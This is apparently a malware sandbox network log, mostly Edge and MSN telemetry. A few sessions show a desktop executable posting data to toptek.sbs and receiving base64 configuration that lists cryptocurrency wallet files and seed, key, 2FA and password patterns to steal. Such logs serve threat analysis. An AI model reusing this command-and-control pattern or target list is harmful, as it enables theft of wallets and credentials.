                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: UID=1B5aaed1ef292e4cd07b08d1734933482; XID=1B5aaed1ef292e4cd07b08d1734933482
2024-12-23 05:58:05 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:05 GMT
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 7bf47dc1c691ee43f7c8db83aa03a3cc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P6
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: hGskPmrhQBFHeIhBDSSe_zt05LhycUK0Pp2aYYwDqImPbSgFwA6QSw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49903 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:05 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6XLN7YM7GVAIM7GDJ5XT
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 6990993
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:58:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 36 58 4c 4e 37 59 4d 37 47 56 41 49 4d 37 47 44 4a 35 58 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6XLN7YM7GVAIM7GDJ5XTCont
2024-12-23 05:58:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:12 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49905 | 20.110.205.119 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:05 UTC | 1261 | OUT | GET /c.gif?rnd=1734933482036&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=0e7012095d61412c88f16ab8ae837c65&activityId=0e7012095d61412c88f16ab8ae837c65&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=63FAA190F2474AB080F91B05DE1E2DE2&MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; SM=T
2024-12-23 05:58:06 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                    Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; domain=.msn.com; expires=Sat, 17-Jan-2026 05:58:05 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                    Set-Cookie: SRM_M=1527A764E6A86BDB2DE6B23AE7AF6A4B; domain=c.msn.com; expires=Sat, 17-Jan-2026 05:58:05 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 30-Dec-2024 05:58:05 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 06:08:05 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:05 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 42
2024-12-23 05:58:06 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49918 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:06 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----TR9Z5XBSR1N7YU3OPPZ5
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:06 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------TR9Z5XBSR1N7YU3OPPZ5Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------TR9Z5XBSR1N7YU3OPPZ5Cont
2024-12-23 05:58:07 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:07 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:07 UTC | 2228 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49928 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:09 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----6XLN7YM7GVAIM7GDJ5XT
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:09 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                    Data Ascii: ------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------6XLN7YM7GVAIM7GDJ5XTContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------6XLN7YM7GVAIM7GDJ5XTCont
2024-12-23 05:58:09 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:09 UTC | 2364 | IN
                                                                                                                                                                                                                                                                                    Data Ascii: 930REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49931 | 20.189.173.14 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:09 UTC | 1071 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933487728&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 11956
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 05:58:09 UTC | 11956 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:58:07.726Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
2024-12-23 05:58:10 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=76796d8d11be4c8d82f3302171e522ed&HASH=7679&LV=202412&V=4&LU=1734933490098; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=5455e467c18544418d35ddfcee59a072; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2370
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:10 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49930 | 20.189.173.14 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:10 UTC | 1070 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933487734&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 5220
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 05:58:10 UTC | 5220 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:58:07.733Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
2024-12-23 05:58:10 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=6a1a3875acf742489afe6c12c1f6249d&HASH=6a1a&LV=202412&V=4&LU=1734933490266; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=78728c77ed8a48b4a3093e8489e6fe5b; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2532
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:10 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49933 | 20.189.173.14 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:10 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933488576&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 5418
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 05:58:10 UTC | 5418 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:58:08.574Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
2024-12-23 05:58:11 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=e1601fd9272c442b832338798920974d&HASH=e160&LV=202412&V=4&LU=1734933490952; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=929ffc093ef9460e8e1a07aeed78e217; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:10 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2376
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:11 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49938 | 20.189.173.14 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:10 UTC | 1060 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933488735&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 9877
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
2024-12-23 05:58:10 UTC | 9877 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-23T05:58:08.734Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"loc
2024-12-23 05:58:11 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
